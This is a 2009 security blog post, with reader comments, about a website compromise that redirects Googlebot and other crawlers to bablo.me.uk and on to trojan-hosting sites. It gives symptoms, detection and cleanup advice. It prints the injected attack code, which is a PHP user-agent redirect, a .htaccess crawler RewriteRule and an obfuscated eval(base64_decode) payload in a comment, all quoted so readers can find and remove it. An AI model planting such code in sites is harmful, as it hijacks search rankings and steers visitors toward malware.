msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Exploit Redirects Googlebot to Malware Sites (Bablo me uk).

   19 Jan 09   Filed in Website exploits

Some time ago I noticed a few sites with a suspicious chain of redirects that always started with “http://bablo .me .uk/” followed with a site with a random 6 digit number as a sub-domain name (e.g. http://www. 524045. secki .info/).

I decided to follow the redirects and find out where they lead to. What I found was a server hosting hundreds of sites optimized for trojan dissemination. I’ll blog about my investigation later. Now let’s talk about the things web masters should know about this exploit.

Symptoms

  • PHP-dirven site. (Especially Joomla-driven)
  • Problems with having web site properly indexed by Google. Some pages don’t get indexed, some pages disappear from the index. If not – it’s only a matter of time.
  • When checking web pages in Unmask Parasites, there is a chain of two 301 redirects reported and the first redirect points to “http://bablo .me .uk/”. However when opening the same pages in a browser, no redirection occurs (even when clicking on Google search results.)

Detection

Use some tool that shows HTTP headers and allows to change User-Agent string. For instance, web-sniffer with the Googlebot user agent. If the site is compromised, you’ll see the following lines in the response headers:

HTTP/1.1 301 Moved Permanently
Location: http://bablo .me .uk/

You can also use my Unmask Parasites to detect this exploit. For compromised sites you will see the following chain of redirects:

301 -> http://bablo .me .uk/
301 -> http://www.642366 .sozunu .de/

The second site in the redirection chain will be different for different sites.

How to clean up?

I can only guess how the sites were compromised, so only general common sense instructions:

  1. Search all server directories for suspicious files and remove them.
  2. Search your .php files on server for the following code
    $agent = $_SERVER['HTTP_USER_AGENT'];
    if (eregi("google", $agent)) {header("HTTP/1.1 301?);
    header("Location: http://bablo .me .uk/”);
    exit(); }

    and remove it. The real code may vary. Try to search for “bablo”.
    Or just upload a fresh copy from backup.

  3. Check your site again (see the detection section) and if the exploit persists, you might need to thoroughly check your database for suspicious entries, or restore a backup copy of the database (You have a backup, haven’t you?)

How to prevent reinfection?

Most likely some Joomla vulnerability was used to inject the malicious code.

  1. Update Joomla to the most recent version.
  2. Make sure all third party Joomla components are up-to-date.
  3. Read more about Joomla security here: Joomla Administrators Security Checklist
  4. If you are using some in-house PHP scripts, consult the PHP Security Guide
  5. Write protect server files that should not be modified by your web application (644 permissions on *nix)
  6. Check your local computers for spyware and viruses.
  7. Change all passwords.

Hope this helps.

In the next post I’ll talk about my investigation, about the malicious sites and their strange SEO efforts.

Update (January 27, 2009): I’ve just found this post on Old Ten Speed Gallery site, that was recently hacked and indeed redirected Googlebot to virus sites via bable.me .uk.

It’s a WordPress site, but the malicious code was not in PHP files. It was in a .htaccess file.

RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://bablo .me .uk/ [R=301,L]

It does the same thing as the PHP code – redirects search engine crawlers  (Googlebot,  Slurp – Yahoo! and msnbot) .

And this exploit worked well for hackers: they managed to hijack top 2 positions in Google search results for “Old Ten Speed Gallery” keyword.

If you have questions, comments, or just want to share some information, don’t hesitate to leave your messages in the Comments section.

Similar posts:

Reader's Comments (20)

  1. |

    Thanks for the information on this attack and the unmaskparasites tool. This one on my sites has proved very ugly — not only did it infect php source files and .htaccess files it inserted code that seemed to be hidden to most of the editors and firefox view source functions; I think because it was before the initial opening tag.

    One additional trick whoever is disseminating this seems to be doing is to insert code like this at the beginning of your php files:
    eval(base64_decode(‘JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmV
    naSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxvY2F0aW9
    uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30=’));

    Apparently that eval statement turns into a bunch of spam links.

    So I’d recommend you do a grep search of all source files for base64_decode — the justified uses of this (like by WordPress) will look very different from the line above.

  2. |

    Thanks for this info guys. I used dreamweaver to scan my folder and found the exploit in wp-blog-header.php

    I initially realized a problem when google webmaster tools had lost my site verification. It kept giving me an error of “Can’t find your Domain” and then it would also give an error about a “301 redirect”. I had also lost my #1 keyword placement. I just deleted the exploit and now google tools has verified my site.

    How long did it take for Ten Speed to get his google placement back?

    • |

      I think it took a couple of days. Maybe slightly more. Did you read his email?

      • |

        Ya I read that email. However, when I check web-sniffer again after I deleted the exploit in my wp-blog-header.php I still see this

        301 Moved Permanently

        Moved Permanently
        The document has moved here (bablo .me .uk/).

        Am I missing something else?

        • |

          I can see the redirect in Unmask Parasites too.

          What exactly did you do to remove the exploit? Did you check the .htaccess file?

          • |

            I scanned all my files and found the following code in my wp-blog-header.php

            $agent = $_SERVER['HTTP_USER_AGENT'];
            if (eregi(”google”, $agent)) {header(”HTTP/1.1 301?);
            header(”Location: http://bablo .me .uk/”);
            exit(); }

            I deleted this and reuploaded the clean file. I checked the .htaccess and did not find anything wrong with it.

          • |

            Did you search for the code mentioned in the first comment. It also redirects to “bablo” site.

            This 301 redirect can be issues on a web server level (.htaccess) or on script level (inside your .php files).
            .htaccess file may be located above the web site root directory.

          • |

            Yea I searched for that as well and couldn’t find it. I’ve checked my .htaccess and scanned all my .php files and cannot seem to find any other issue.

          • |

            OK. I checked other sites on your server and they don’t redirect Googlebot anywhere, so this problem is not server-wide.

            Try to create a static .html file in a root directory. Then request it as a Googlebot (using web-sniffer, or my tool). If the request will be redirected – you should check .htaccess or other Apache-level settings. If it won’t be redirected – you should check .php files for the redirect code.

          • |

            Thanks for all your help Denis. I still get the redirect with the static html file. I checked .htaccess and can’t seem to find any issues. How do I know if its an apache level setting?

          • |

            You might want to contact your hosting provider. They should know more about details of your Apache settings.

  3. |

    I feel like an idiot now. The .htaccess rewrite was all the way down at the bottom of the page. I had not scrolled all the way down to view it. Problem solved. Thanks

  4. |

    When I deleted the following code from my htaccess in my root folder, (I am using wordpress not joomla) my entire site has now went to 404 error. I got the homepage backup. but the rest is down.

    Wow. Any advice?

  5. |

    After I deleted the hack code from htaccess, my entire site now gives a 404 error.

    I am using wordpress. Any advice?

    • |

      Many content management systems like Joomla and WordPress use their own Redirect rules in .htaccess files to be able to provide “pretty” permalinks.

      Make sure you don’t remove legitimate rules from .htaccess.

  6. |

    [...] abbastanza bene delineati in questi due post che ho trovato mentre analizzavo i miei siti: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” e “Did your WordPress site get hacked?“, piuttosto [...]

  7. |

    Oh this post is a life saver. I’ve been trying to diagnose this problem for months!

    Don’t know how to identify the security hole that allowed access to .htaccess but at least I can remove the malicious code.

    thanks!

  8. |

    M having this problem for sometime now and most of the times when make a new post they do not get indexed and now their are like 16 of em that are no getting indexed and the list is increasing as the number of posts are increasing please sir if u get do get time do check my blog.

  9. |

    yeah…That’s really very bad..! I was stuck once…! It totally drops your traffic..!

  10. |

    [...] new “canonical” hack resembles an older “301 redirect” hack where criminals configure compromised sites to redirect search engine crawlers [...]